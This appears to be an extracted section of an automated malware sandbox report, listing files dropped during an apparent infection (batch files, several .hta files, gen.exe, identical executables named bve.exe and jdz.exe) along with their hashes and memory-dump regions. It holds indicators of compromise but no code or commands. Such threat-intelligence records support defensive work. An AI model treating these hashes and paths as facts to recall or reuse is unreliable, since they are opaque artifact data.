43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

SHA512
45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
55KB

MD5
2a6512b2ff591a919d840f3dda0a9b54

SHA1
ad402c1ccd84cac073c4842fc1e8c928b412bbd9

SHA256
360416e93203589e846671ed48cbdd355baca60f42ea65c5ec7bc5fdeac6232c

SHA512
b7c9417277421ff7a8c4c8f884507800f1fcc7f887cc454b7d92e21e4290b449c1285d3643fff76ada26cc5a7a7d9bee13142b8e4b09eb76e7a44a8e061de06c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
09fb6d8dc97e6d566c79fe84bf72b5f8

SHA1
72ce2c5b69b39acbedddd245acd5d0a79f6966d4

SHA256
cc16e67dfbb4dc2efd0c0ae802a04a7bc1fd455f97d3d702672aeaa3c845a69f

SHA512
6dce08ee1fde89b3396cf4ca96050bf3e0e2a849e44f81657bc087d01363cfd886893c65ea2edae0404f8acd74103ebf5ee96796a6b45a065606d4669ac3777a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
5844e99decff8a673de61d3486773532

SHA1
4e4cf056bf770caae92f6515bebf07ff92a689e7

SHA256
19c4e92238b6ce1d46fb1c3d0b5e61009d005339034fc726980ced1b65b3e351

SHA512
0ba1c24c7043c8102bf658d0f839b70f9c335ca489583d6e5071149adb591d259f5274a7bf9b81c427a0b4c89016c7e73c74990d1ecd7d92c229a4f72302f9e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dc2cd184abd494953866aaeb5e5318e9

SHA1
8878852f9aa16ed5eae7f67904c294e00af2f240

SHA256
b16bf6d5082d0b0b1b98d4bb538e2fd78b2923897bee35e962fa95bd593e8dd3

SHA512
25c6d54241beb8d4c0235f137a205f6753fbc817a5751054ec39c2dd7e258d85fe934e1f3ac2a1f0c770185a25af3c6d434fc023f772883b277caeff1d42c753

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
811a6554ff43fb15bcef59ca91c55214

SHA1
cbea2d6199edc6dbfc4382c64e6e93c9c2484e7a

SHA256
946d467b97215ff1fb2014e104474b338a671184a317b0acb172bf1ce8c73ac9

SHA512
c85a3a9a580af18e8de0d4a0dd918a40caeb3c09252874079e01f6e58960786013f0ba9e5bdf08d2ae802ec28a1bbbb039e426acc0e4ea4dcafdc79bc8ae2e2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\9F04.tmp\start.bat

Filesize
60B

MD5
210943872932de11fcdf7ea3723bc5c6

SHA1
1441e366faf476759ee83c868ed8c3fa6dddef49

SHA256
8e02b4a77db3465df283dca7afcbe9bcf1776763b63fd3dab5fd7e98316225e2

SHA512
9bb03b0d67b5f2e36c1560d136d21157b2b32c205349af4851a632c2924d2daed96ca70ddbe68cab47b18dc611b78da8902c34c6844c3b99bec7693a49db73d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\DJMOZCB1

Filesize
112KB

MD5
780853cddeaee8de70f28a4b255a600b

SHA1
ad7a5da33f7ad12946153c497e990720b09005ed

SHA256
1055ff62de3dea7645c732583242adf4164bdcfb9dd37d9b35bbb9510d59b0a3

SHA512
e422863112084bb8d11c682482e780cd63c2f20c8e3a93ed3b9efd1b04d53eb5d3c8081851ca89b74d66f3d9ab48eb5f6c74550484f46e7c6e460a8250c9b1d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\b1.hta

Filesize
4KB

MD5
e66d251ec771c96871b379e9190ff7a1

SHA1
37f14cd2f77b3f1877e266dc1f7e8df882119912

SHA256
2778e5c8e94981206b305108d42ac9c9d7be5f36eaf94cab2483120e9d3d3696

SHA512
4a8c886a828f61b031e9169886711da85d411535e2b6b1062614cd3fee4947fe340a60125dd0f30523a359ca677debbeba15ed55497e2bbe24787dfa5309ce88

Download Submit
C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\b1a.hta

Filesize
4KB

MD5
5fc9f573414f4bdf535974dcc5812b87

SHA1
028b64ccbb98e650ee4909de019b0ff2da4cd138

SHA256
3b282cd60bc0c9689b4a68d2013f986e3534190042c8359be580db7004803118

SHA512
dfaaa82faa1ea65ed4da21bcebf7ca9821feef63b6ebb6b5d9ad40dd839520e2dffd4ed90fa10e2dbe670f377e6ad5bd59f4fcf115e29e693493325558ce253c

Download Submit
C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\b2.hta

Filesize
4KB

MD5
68950206a64bdad979c35f5e4a67e8be

SHA1
d2789c3e940275ba2c30a6b5eb8c91da5751f1f9

SHA256
4864a18f70757f92fcf8631c918687e528768165dff70b8f5ebacd29a256e6bf

SHA512
8ca1391b917ff14b3c3b4f3145d9248b0ca154033646b9efbf3121d1a150ccfe5fad005a20f61b19ca95486e9d00caef9c12b98f5dba65a3a9ed84a6394c1d57

Download Submit
C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\b2a.hta

Filesize
4KB

MD5
aad742136ab66a8cedceeb0d5175c249

SHA1
98103efcf3c76f5b5ba4ad208702ac49e8da1f4f

SHA256
63f208e5dc8a4bf02bb5ed4e65a8e187bfbbe43856d6546fdb49efa555b46af6

SHA512
23e0c5c6bb379610fe37ef64f5b3e49152c6d221229a6f4dc448d6076506f9c4b72e36691fa12d761c6fc32d96cba810e6ad6406d8ef6f29bd294cb951867093

Download Submit
C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\m1.hta

Filesize
4KB

MD5
a75bddf46ecdadb3cbf1ff26a9c52c9e

SHA1
1c58d74bba1df1293494e248abd35d38153696df

SHA256
fc97cfcd0a76d1e8fbffb3c2ae137bdd08f5e05114c20c8049cc52d08421b287

SHA512
054464f5a10a4694ccfe3ec760e38afee83873d8b1d40b58bd1193a0f609ae57c0e7725c5a139dbdd61e8cd5b69f9ad1d1448aee03c594ee7d948a0fc8b4b5e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\m1a.hta

Filesize
4KB

MD5
f4db89dbe45cd8e7fb12009af13a9608

SHA1
b8682e5b10d93b32e01858355e50fd2c7daafde3

SHA256
48a17e20a2f884bf3d97e30a43bc7af1141832f28fc4feeb33ade73e4c9487aa

SHA512
b5df1b079ad5fda423a0bdd62bf2c0fb3c825ec3a237f36eef40bc4a572cf30bef2b434d448c93c52bfc1cbed3b1bc9b93b10ffe124f7cbd3f66f5aaa894b182

Download Submit
C:\Users\Admin\AppData\Local\Temp\9FB0.tmp\start2.bat

Filesize
132B

MD5
b775a1ac4fb96d9d35bbded9ea742f0c

SHA1
99b0c8d6cb5769f6aa2d292d4d9471d35ce66881

SHA256
d6956455e62011b28826a709db4e65a7b3595023512349d2681f22a07e6f1ce8

SHA512
85486d7b50a3ba35713b6f134286c2af35033ca392ef2b47d88516aafca6ea8cd245ce6be67e5c728fd539ed7da5c9a3291ed7b0b39cb5259939e84fb6a4052c

Download Submit
C:\Users\Admin\AppData\Local\Temp\gen.exe

Filesize
24KB

MD5
76ea003513a4fcde2517a83f607f1624

SHA1
a1ffde782b420741de47e4b744d6eb40dd562e69

SHA256
3be8f8bd211fd2b2caaa25edad1422d0737763cc6377e3e0c73cf5d953e7880b

SHA512
411173b144144b21ac7cc21c65d0ac03bab15e95c89e857a1e25f699f88a88c8479f46b8f4e99b470dba98272f891c621ac8cd3c73c38d53bcff11e21a26bd54

Download Submit
C:\Users\Admin\AppData\Local\Temp\gen.exe

Filesize
24KB

MD5
76ea003513a4fcde2517a83f607f1624

SHA1
a1ffde782b420741de47e4b744d6eb40dd562e69

SHA256
3be8f8bd211fd2b2caaa25edad1422d0737763cc6377e3e0c73cf5d953e7880b

SHA512
411173b144144b21ac7cc21c65d0ac03bab15e95c89e857a1e25f699f88a88c8479f46b8f4e99b470dba98272f891c621ac8cd3c73c38d53bcff11e21a26bd54

Download Submit
C:\Users\Public\bve.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Public\bve.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Public\jdz.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
C:\Users\Public\jdz.exe

Filesize
100KB

MD5
c7a310982da68b10360854f9cd78e718

SHA1
60140c28e0b7db797a771c2dee081fa3812246db

SHA256
df4876573295b4e7beb618db31a015ea617f61b811978bb168d432c4052f7731

SHA512
6747fa3f7637922eeaa0feeb25d430dc6ab66fd9f3d22e7e5fd16bad9b75528a8174c34a8baf681950b64e8cdaa6a14e37633592e843c363e75468622ebd2ec3

Download Submit
memory/1272-156-0x0000000002B50000-0x0000000002B86000-memory.dmp

Filesize
216KB

Download
memory/1272-157-0x00000000055D0000-0x0000000005BF8000-memory.dmp

Filesize
6.2MB

Download
memory/1564-175-0x0000000000BF0000-0x0000000000C0E000-memory.dmp

Filesize
120KB

Download
memory/1600-166-0x0000000008720000-0x0000000008CC4000-memory.dmp

Filesize
5.6MB

Download
memory/1864-178-0x0000000005420000-0x000000000542A000-memory.dmp

Filesize
40KB

Download
memory/1864-176-0x0000000005360000-0x00000000053F2000-memory.dmp

Filesize
584KB

Download
memory/3188-162-0x0000000007C80000-0x00000000082FA000-memory.dmp

Filesize
6.5MB

Download
memory/3300-160-0x0000000005350000-0x00000000053B6000-memory.dmp

Filesize
408KB

Download
memory/3300-165-0x0000000006BB0000-0x0000000006BD2000-memory.dmp

Filesize
136KB

Download
memory/3300-164-0x0000000006FA0000-0x0000000007036000-memory.dmp

Filesize
600KB

Download
memory/3484-158-0x0000000005AA0000-0x0000000005AC2000-memory.dmp

Filesize
136KB

Download
memory/3484-161-0x0000000006860000-0x000000000687E000-memory.dmp

Filesize
120KB

Download
memory/3484-163-0x0000000006D20000-0x0000000006D3A000-memory.dmp

Filesize
104KB

Download
memory/3500-159-0x0000000005140000-0x00000000051A6000-memory.dmp

Filesize
408KB

Download
memory/3540-135-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/4908-183-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4908-193-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4908-186-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4908-242-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4980-195-0x0000000060900000-0x0000000060992000-memory.dmp

Filesize
584KB

Download
memory/4980-194-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4980-241-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download